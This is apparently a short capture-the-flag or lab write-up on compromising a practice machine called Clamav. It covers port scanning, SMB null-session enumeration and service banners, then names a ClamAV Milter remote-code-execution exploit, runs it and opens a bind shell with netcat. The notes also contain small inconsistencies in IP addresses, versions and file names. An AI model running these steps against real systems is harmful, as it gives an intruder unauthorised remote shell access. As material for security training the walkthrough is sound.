Clamav

Rustscan

rustscan -a 192.168.202.43 --ulimit 5000 -- -Pn -sV --script \"'vuln'\" -oA clamav

Open ports

 
Open 192.168.202.42:22
Open 192.168.202.42:25
Open 192.168.202.42:80
Open 192.168.202.42:139
Open 192.168.202.42:199
Open 192.168.202.42:445
Open 192.168.202.42:60000

Port 80

Running Nikto and feroxbuster in background

Interesting findings

Apache 1.3.33
The home page show a text of binary which says after converting it to decimal that ifyoudontpwnmeuran00b.

Port 445

Null sessions allowed

SMB         192.168.202.42  445    NONE             print$                          Printer Drivers
SMB         192.168.202.42  445    NONE             IPC$                            IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
SMB         192.168.202.42  445    NONE             ADMIN$                          IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)

Samba 3.10.14a-Debian

Port 60000 & 22

SSH-2.0-OpenSSH_3.8.1p1 Debian-8.sarge.6

Port 25

220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3;

Looking for know exploits

Nothing Interesting found

Looking for the exploit for hostname itself

Exploit Used

Product affected : clam av
Exploit Used : ClamAV Milter Blackhole-Mode Remote Code Execution (searchsploit -m multiple/remote/4761.pl)

perl 4761.p1 $IP
nc $IP 31337

got the flag.

Malleum Knowledge Base

Explorer

Clamav

Rustscan

Open ports

Port 80

Interesting findings

Port 445

Port 60000 & 22

Port 25

Looking for know exploits

Looking for the exploit for hostname itself

Exploit Used

Graph View

Table of Contents